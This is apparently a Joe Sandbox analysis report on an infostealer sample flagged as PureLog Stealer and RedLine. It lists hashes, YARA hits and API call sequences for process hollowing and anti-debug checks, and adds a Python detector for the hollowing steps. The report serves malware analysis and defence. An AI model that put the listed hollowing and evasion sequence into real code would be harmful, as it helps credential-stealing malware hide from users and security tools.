                                                                                                                                      Start time:20:47:29
                                                                                                                                      Start date:02/01/2025
                                                                                                                                      Path:C:\Users\Public\Libraries\rpkhzpuO.pif
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:C:\Users\Public\Libraries\rpkhzpuO.pif
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:175'800 bytes
                                                                                                                                      MD5 hash:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000013.00000002.23188607246.0000000030743000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000013.00000002.23176421665.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000013.00000002.23190771291.0000000032F70000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000013.00000002.23191645092.00000000335E0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000013.00000003.23143070311.000000002E873000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000013.00000002.23190455309.0000000031995000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000013.00000001.23140173632.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:20
                                                                                                                                      Start time:20:47:49
                                                                                                                                      Start date:02/01/2025
                                                                                                                                      Path:C:\Users\user\AppData\Roaming\ACCApi\apihost.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\user\AppData\Roaming\ACCApi\apihost.exe"
                                                                                                                                      Imagebase:0xb00000
                                                                                                                                      File size:665'670'656 bytes
                                                                                                                                      MD5 hash:785BCB4933871B92E40A89544BFA615E
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Antivirus matches:
                                                                                                                                      • Detection: 100%, Avira
                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                      Has exited:false


                                                                                                                                        Execution Graph

                                                                                                                                        Execution Coverage:15.2%
                                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                                        Signature Coverage:10.3%
                                                                                                                                        Total number of Nodes:290
                                                                                                                                        Total number of Limit Nodes:16

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 02DE881C: LoadLibraryA.KERNEL32(00000000,00000000,02DE8903), ref: 02DE8850
                                                                                                                                          • Part of subcall function 02DE881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02DE8903), ref: 02DE8860
                                                                                                                                          • Part of subcall function 02DE881C: GetProcAddress.KERNEL32(74BD0000,00000000), ref: 02DE8879
                                                                                                                                          • Part of subcall function 02DE881C: FreeLibrary.KERNEL32(74BD0000,00000000,02E31388,Function_000065D8,00000004,02E31398,02E31388,000186A3,00000040,02E3139C,74BD0000,00000000,00000000,00000000,00000000,02DE8903), ref: 02DE88E3
                                                                                                                                          • Part of subcall function 02DE85D4: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02DE8660
                                                                                                                                        • GetThreadContext.KERNEL32(00000844,02E31420,ScanString,02E313A4,02DEA774,UacInitialize,02E313A4,02DEA774,ScanBuffer,02E313A4,02DEA774,ScanBuffer,02E313A4,02DEA774,UacInitialize,02E313A4), ref: 02DE943A
                                                                                                                                          • Part of subcall function 02DE824C: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02DE82BD
                                                                                                                                          • Part of subcall function 02DE84BC: NtUnmapViewOfSection.NTDLL(?,?), ref: 02DE8521
                                                                                                                                          • Part of subcall function 02DE79AC: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02DE7A1F
                                                                                                                                          • Part of subcall function 02DE7CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02DE7D6C
                                                                                                                                        • SetThreadContext.KERNEL32(00000844,02E31420,ScanBuffer,02E313A4,02DEA774,ScanString,02E313A4,02DEA774,Initialize,02E313A4,02DEA774,00000840,00399FF8,02E314F8,00000004,02E314FC), ref: 02DEA14F
                                                                                                                                        • NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(00000844,00000000,00000844,02E31420,ScanBuffer,02E313A4,02DEA774,ScanString,02E313A4,02DEA774,Initialize,02E313A4,02DEA774,00000840,00399FF8,02E314F8), ref: 02DEA15C
                                                                                                                                          • Part of subcall function 02DE8798: LoadLibraryW.KERNEL32(bcrypt,?,00000844,00000000,02E313A4,02DEA3BF,ScanString,02E313A4,02DEA774,ScanBuffer,02E313A4,02DEA774,Initialize,02E313A4,02DEA774,UacScan), ref: 02DE87AC
                                                                                                                                          • Part of subcall function 02DE8798: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02DE87C6
                                                                                                                                          • Part of subcall function 02DE8798: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000844,00000000,02E313A4,02DEA3BF,ScanString,02E313A4,02DEA774,ScanBuffer,02E313A4,02DEA774,Initialize), ref: 02DE8802
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Library$MemoryThreadVirtual$AddressContextFreeLoadProc$AllocateCreateHandleModuleProcessReadResumeSectionUnmapUserViewWrite
                                                                                                                                        • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                                                                                        • API String ID: 4083799063-51457883
                                                                                                                                        • Opcode ID: 1787fc41c0630f3706d654ce9e8c69d369d4fdbf2911c728722972445c4a7df8
                                                                                                                                        • Instruction ID: 79347744aca62a3f0e340a647741a63fc61b250bf34e5103238ec75174a61192
                                                                                                                                        • Opcode Fuzzy Hash: 1787fc41c0630f3706d654ce9e8c69d369d4fdbf2911c728722972445c4a7df8
                                                                                                                                        • Instruction Fuzzy Hash: F8E22E35A409599FDF11FBA4DC91ADE73BAEF44311F1181A5E00AAB314DE30EE868F64

                                                                                                                                        Control-flow Graph

call 2dd4798 call 2dd494c call 2de8798 call 2dd480c call 2dd494c call 2dd4798 call 2dd494c call 2de8798 call 2de7ecc call 2de8798 * 2 8155->8206 8207 2de9ca9-2de9cf6 call 2de89b0 call 2de89a4 8155->8207 8206->7687 8207->8206
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 02DE881C: LoadLibraryA.KERNEL32(00000000,00000000,02DE8903), ref: 02DE8850
                                                                                                                                          • Part of subcall function 02DE881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02DE8903), ref: 02DE8860
                                                                                                                                          • Part of subcall function 02DE881C: GetProcAddress.KERNEL32(74BD0000,00000000), ref: 02DE8879
                                                                                                                                          • Part of subcall function 02DE881C: FreeLibrary.KERNEL32(74BD0000,00000000,02E31388,Function_000065D8,00000004,02E31398,02E31388,000186A3,00000040,02E3139C,74BD0000,00000000,00000000,00000000,00000000,02DE8903), ref: 02DE88E3
                                                                                                                                          • Part of subcall function 02DE85D4: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02DE8660
                                                                                                                                        • GetThreadContext.KERNEL32(00000844,02E31420,ScanString,02E313A4,02DEA774,UacInitialize,02E313A4,02DEA774,ScanBuffer,02E313A4,02DEA774,ScanBuffer,02E313A4,02DEA774,UacInitialize,02E313A4), ref: 02DE943A
                                                                                                                                          • Part of subcall function 02DE824C: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02DE82BD
                                                                                                                                          • Part of subcall function 02DE84BC: NtUnmapViewOfSection.NTDLL(?,?), ref: 02DE8521
                                                                                                                                          • Part of subcall function 02DE79AC: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02DE7A1F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                         • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                         • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                         • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                         • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                         • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LibraryMemoryVirtual$AddressAllocateContextCreateFreeHandleLoadModuleProcProcessReadSectionThreadUnmapUserView
                                                                                                                                        • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                                                                                        • API String ID: 2852987580-51457883
                                                                                                                                        • Opcode ID: 171e90f856324784d8ead397d8089afb2649fb77b19e848d0faf490e85122138
                                                                                                                                        • Instruction ID: 104846704a0ac4325a7767e5d2c0910c8d47b627006745e35a952cf24756babc
                                                                                                                                        • Opcode Fuzzy Hash: 171e90f856324784d8ead397d8089afb2649fb77b19e848d0faf490e85122138
                                                                                                                                        • Instruction Fuzzy Hash: 70E22E35A409599FDF11FBA4DC91ADE73BAEF44311F1181A5E00AAB314DE30EE868F64

                                                                                                                                        Control-flow Graph

                                                                                                                                        control_flow_graph 8510 2dd5a78-2dd5ab9 GetModuleFileNameA RegOpenKeyExA 8511 2dd5afb-2dd5b3e call 2dd58b4 RegQueryValueExA 8510->8511 8512 2dd5abb-2dd5ad7 RegOpenKeyExA 8510->8512 8517 2dd5b40-2dd5b5c RegQueryValueExA 8511->8517 8518 2dd5b62-2dd5b7c RegCloseKey 8511->8518 8512->8511 8513 2dd5ad9-2dd5af5 RegOpenKeyExA 8512->8513 8513->8511 8515 2dd5b84-2dd5bb5 lstrcpynA GetThreadLocale GetLocaleInfoA 8513->8515 8519 2dd5c9e-2dd5ca5 8515->8519 8520 2dd5bbb-2dd5bbf 8515->8520 8517->8518 8521 2dd5b5e 8517->8521 8523 2dd5bcb-2dd5be1 lstrlenA 8520->8523 8524 2dd5bc1-2dd5bc5 8520->8524 8521->8518 8525 2dd5be4-2dd5be7 8523->8525 8524->8519 8524->8523 8526 2dd5be9-2dd5bf1 8525->8526 8527 2dd5bf3-2dd5bfb 8525->8527 8526->8527 8528 2dd5be3 8526->8528 8527->8519 8529 2dd5c01-2dd5c06 8527->8529 8528->8525 8530 2dd5c08-2dd5c2e lstrcpynA LoadLibraryExA 8529->8530 8531 2dd5c30-2dd5c32 8529->8531 8530->8531 8531->8519 8532 2dd5c34-2dd5c38 8531->8532 8532->8519 8533 2dd5c3a-2dd5c6a lstrcpynA LoadLibraryExA 8532->8533 8533->8519 8534 2dd5c6c-2dd5c9c lstrcpynA LoadLibraryExA 8533->8534 8534->8519
                                                                                                                                        APIs
                                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000105,02DD0000,02DFD790), ref: 02DD5A94
                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02DD0000,02DFD790), ref: 02DD5AB2
                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02DD0000,02DFD790), ref: 02DD5AD0
                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02DD5AEE
                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02DD5B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02DD5B37
                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,02DD5CE4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02DD5B7D,?,80000001), ref: 02DD5B55
                                                                                                                                        • RegCloseKey.ADVAPI32(?,02DD5B84,00000000,?,?,00000000,02DD5B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02DD5B77
                                                                                                                                        • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02DD5B94
                                                                                                                                        • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02DD5BA1
                                                                                                                                        • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02DD5BA7
                                                                                                                                        • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02DD5BD2
                                                                                                                                        • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02DD5C19
                                                                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02DD5C29
                                                                                                                                        • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02DD5C51
                                                                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02DD5C61
                                                                                                                                        • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02DD5C87
                                                                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02DD5C97
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                         • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                         • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                         • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                         • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                         • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                                                                        • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                                        • API String ID: 1759228003-2375825460
                                                                                                                                        • Opcode ID: 23775d756b06e0754618453caf6fedc862cd5ea6be405f1f5244f53fc281fd85
                                                                                                                                        • Instruction ID: baf6669b5f1fe591e71dfbad22e0a578ecca11d6cc99fba9037c634fa1deb807
                                                                                                                                        • Opcode Fuzzy Hash: 23775d756b06e0754618453caf6fedc862cd5ea6be405f1f5244f53fc281fd85
                                                                                                                                        • Instruction Fuzzy Hash: C6519571A40A0C7EFB21D6E49C46FEF7BADDB04744F8045A1A604E6281D774DE48CFA0

                                                                                                                                        Control-flow Graph

                                                                                                                                        control_flow_graph 10523 2de8798-2de87bd LoadLibraryW 10524 2de87bf-2de87d7 GetProcAddress 10523->10524 10525 2de8807-2de880d 10523->10525 10526 2de87fc-2de8802 FreeLibrary 10524->10526 10527 2de87d9-2de87f8 call 2de7cf8 10524->10527 10526->10525 10527->10526 10530 2de87fa 10527->10530 10530->10526
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryW.KERNEL32(bcrypt,?,00000844,00000000,02E313A4,02DEA3BF,ScanString,02E313A4,02DEA774,ScanBuffer,02E313A4,02DEA774,Initialize,02E313A4,02DEA774,UacScan), ref: 02DE87AC
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02DE87C6
                                                                                                                                        • FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000844,00000000,02E313A4,02DEA3BF,ScanString,02E313A4,02DEA774,ScanBuffer,02E313A4,02DEA774,Initialize), ref: 02DE8802
                                                                                                                                          • Part of subcall function 02DE7CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02DE7D6C
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                                                                                                                                        • String ID: BCryptVerifySignature$bcrypt
                                                                                                                                        • API String ID: 1002360270-4067648912
                                                                                                                                        • Opcode ID: b4aa80c8dc1ac915b2abb6f0b55e26ad0c729c1675b9107b437385e892138108
                                                                                                                                        • Instruction ID: fb37dae66a34f06c8442e8d92732995bbfb8e02a1ca18c3c98479bc67bdd45ff
                                                                                                                                        • Opcode Fuzzy Hash: b4aa80c8dc1ac915b2abb6f0b55e26ad0c729c1675b9107b437385e892138108
                                                                                                                                        • Instruction Fuzzy Hash: EBF08C71AC02185AEB10AA6AA84DBB6379CE780356F42092EF10DCB640C7705890CBA0
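
The API list for the function at 02DE8BA6 above (CreateProcessAsUserW, GetThreadContext, NtReadVirtualMemory, NtUnmapViewOfSection, NtAllocateVirtualMemory, SetThreadContext, NtResumeThread), together with the NtWriteVirtualMemory subcall at 02DE7CF8 listed under the function at 02DE8798, is the process hollowing sequence behind the "Sample uses process hollowing technique" signature. The Python below is an added example and is not part of the Joe Sandbox report or of the sample: it parses API entries in this report's "Name.MODULE(args), ref: addr" format and checks whether the hollowing steps appear as an ordered subsequence, tolerating unrelated calls in between. The embedded lines are constructed to mirror the entries above; the argument values and the ref addresses of the SetThreadContext and NtResumeThread lines are placeholders.

```python
import re

# Constructed sample in the "APIs" list format of this report page. API names
# and DLLs mirror the entries above; the argument values and the ref addresses
# of the last two lines are placeholders, not taken from the sample.
SAMPLE_API_LINES = """
• Part of subcall function 02DE85D4: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02DE8660
• GetThreadContext.KERNEL32(00000844,02E31420), ref: 02DE943A
• Part of subcall function 02DE824C: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02DE82BD
• Part of subcall function 02DE84BC: NtUnmapViewOfSection.NTDLL(?,?), ref: 02DE8521
• Part of subcall function 02DE79AC: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02DE7A1F
• Part of subcall function 02DE7CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02DE7D6C
• SetThreadContext.KERNEL32(00000844,02E31420), ref: 02DEA3B0
• NtResumeThread.NTDLL(00000844,00000000), ref: 02DEA3C0
"""

# One "Name.MODULE(" occurrence per line; the "Part of subcall function ..."
# prefix never matches because its hex address is followed by ':' not '.'.
API_LINE = re.compile(r"(?P<api>[A-Za-z_]\w*)\.(?P<module>\w+)\(")

# Ordered skeleton of process hollowing. Each step lists the spellings that
# satisfy it (native Nt/Zw, Win32 and WoW64 variants); the first is canonical.
HOLLOWING_STEPS = (
    ("CreateProcessAsUserW", "CreateProcessAsUserA", "CreateProcessW",
     "CreateProcessA", "CreateProcessInternalW"),        # spawn target (suspended)
    ("GetThreadContext", "Wow64GetThreadContext"),       # read its registers/entry
    ("NtUnmapViewOfSection", "ZwUnmapViewOfSection"),    # hollow the original image
    ("NtAllocateVirtualMemory", "ZwAllocateVirtualMemory", "VirtualAllocEx"),
    ("NtWriteVirtualMemory", "ZwWriteVirtualMemory", "WriteProcessMemory"),
    ("SetThreadContext", "Wow64SetThreadContext"),       # point thread at payload
    ("NtResumeThread", "ZwResumeThread", "ResumeThread"),  # run it
)


def parse_api_calls(text):
    """Return (api, MODULE) tuples in the order the lines list them."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.search(line)
        if m:
            calls.append((m.group("api"), m.group("module").upper()))
    return calls


def detect_hollowing(text):
    """Check whether the hollowing skeleton appears, in order, in the API list.

    Other calls may sit between steps (NtReadVirtualMemory between
    GetThreadContext and NtUnmapViewOfSection on this page, for example),
    but every step must follow the previously matched one.
    """
    calls = parse_api_calls(text)
    matched, missing, pos = [], [], 0
    for step in HOLLOWING_STEPS:
        hit = next(((i, api) for i, (api, _module) in enumerate(calls)
                    if i >= pos and api in step), None)
        if hit is None:
            missing.append(step[0])  # report the canonical name
            continue
        pos = hit[0] + 1             # later steps must come after this call
        matched.append(hit[1])
    return {"complete": not missing, "matched": matched, "missing": missing}


if __name__ == "__main__":
    verdict = detect_hollowing(SAMPLE_API_LINES)
    print("process hollowing sequence complete:", verdict["complete"])
    print("matched:", " -> ".join(verdict["matched"]))
    if verdict["missing"]:
        print("missing steps:", ", ".join(verdict["missing"]))
```

Note that the per-function API list on this page is a listing of calls reachable from the function (the "Part of subcall function" entries), not a runtime trace, so a match here shows the capability is present in the code; running the same check over the dynamic API trace of the process confirms that the sequence actually executed.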

                                                                                                                                        Control-flow Graph

                                                                                                                                        control_flow_graph 10540 2deebe8-2deec02 GetModuleHandleW 10541 2deec2e-2deec36 10540->10541 10542 2deec04-2deec16 GetProcAddress 10540->10542 10542->10541 10543 2deec18-2deec28 CheckRemoteDebuggerPresent 10542->10543 10543->10541 10544 2deec2a 10543->10544 10544->10541
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleW.KERNEL32(KernelBase), ref: 02DEEBF8
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02DEEC0A
                                                                                                                                        • CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02DEEC21
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressCheckDebuggerHandleModulePresentProcRemote
                                                                                                                                        • String ID: CheckRemoteDebuggerPresent$KernelBase
                                                                                                                                        • API String ID: 35162468-539270669
                                                                                                                                        • Opcode ID: ee7607092efe533ddd65ca06b9ea4751511744a845a9465abb73291508ef6690
                                                                                                                                        • Instruction ID: b8f6a589c080914d467d6a152926a15046ed2235939d4c2d54adbd65b181e7d9
                                                                                                                                        • Opcode Fuzzy Hash: ee7607092efe533ddd65ca06b9ea4751511744a845a9465abb73291508ef6690
                                                                                                                                        • Instruction Fuzzy Hash: B2F0A73490464CAEDF12B6E8D8887DCFBA99B09338F6807D4D426712C1E7711A44C6A1

                                                                                                                                        Control-flow Graph

APIs
  • Part of subcall function 02DD4ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02DD4EDA
• RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02DEDC78), ref: 02DEDBE3
• NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02DEDC78), ref: 02DEDC13
• NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02DEDC28
• NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02DEDC54
• NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02DEDC5D
  • Part of subcall function 02DD4C0C: SysFreeString.OLEAUT32(02DEE948), ref: 02DD4C1A
Memory Dump Source
• Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
• Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
Similarity
• API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
• String ID:
• API String ID: 1897104825-0
• Opcode ID: 85cf5070ae57d72509bd3c2c9cd65ae3664227fdf03765c0a2b006a876ddb3ad
• Instruction ID: 55af4c426cc1516219d1b6ec26aec5ec8d6b6f95adc8b5d9c4037f7d0ffb7b34
